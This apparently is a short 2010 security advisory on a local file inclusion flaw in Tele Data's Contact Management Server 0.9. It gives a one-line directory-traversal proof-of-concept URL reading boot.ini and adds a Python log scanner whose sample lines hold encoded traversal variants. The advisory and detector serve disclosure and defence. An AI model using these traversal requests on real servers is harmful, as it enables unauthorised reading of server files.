This site is soon to be deprecated by http://www.johnleitch.net

Sunday, May 23, 2010

Tele Data's Contact Management Server 0.9 Local File Inclusion

A local file inclusion vulnerability in Tele Data's Contact Management Server 0.9 can be exploited to read files from the server file system.

PoC
Log in as an administrator and navigate to http://localhost/command.html?Cmd=SQL_Load&FileName=..\..\..\..\..\..\..\..\..\boot.ini
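
A defender's check for the request pattern in the PoC, as an added example that is not part of the original advisory: it scans web access log lines for SQL_Load requests to command.html whose FileName value contains a traversal sequence or an absolute path. The log format, the sample lines and the case-insensitive parameter matching are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not taken from a real server).
SAMPLE_LOG = [
    '10.0.0.5 - admin [23/May/2010:10:01:02] "GET /command.html?Cmd=SQL_Load&FileName=contacts.sql HTTP/1.1" 200',
    '10.0.0.9 - admin [23/May/2010:10:03:44] "GET /command.html?Cmd=SQL_Load&FileName=..\\..\\..\\boot.ini HTTP/1.1" 200',
    '10.0.0.9 - admin [23/May/2010:10:04:10] "GET /command.html?Cmd=SQL_Load&FileName=%2e%2e%5c%2e%2e%5cboot.ini HTTP/1.1" 200',
    '10.0.0.9 - admin [23/May/2010:10:05:31] "GET /command.html?cmd=sql_load&filename=C:%5Cboot.ini HTTP/1.1" 200',
    '10.0.0.7 - admin [23/May/2010:10:06:00] "GET /command.html?Cmd=Status HTTP/1.1" 200',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def is_unsafe_filename(value):
    """True if the value could resolve outside the intended directory."""
    # Decode repeatedly to catch double-encoded input such as %252e%252e.
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    path = value.replace("\\", "/")  # treat both separators alike
    if path.startswith("/") or re.match(r"^[A-Za-z]:", path):
        return True  # absolute path, UNC path or drive letter
    return ".." in path.split("/")  # a whole ".." component, not "a..b"

def flag_traversal(lines):
    """Return the log lines whose SQL_Load request carries an unsafe FileName."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if url.path.lower() != "/command.html":
            continue
        # Assumption: the server matches parameter names case-insensitively.
        params = {k.lower(): v for k, v in parse_qs(url.query).items()}
        if "sql_load" not in [c.lower() for c in params.get("cmd", [])]:
            continue
        if any(is_unsafe_filename(f) for f in params.get("filename", [])):
            hits.append(line)
    return hits
```

The same is_unsafe_filename test can serve as an input check in front of the file-loading code, rejecting any value it flags before a path is built from it.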
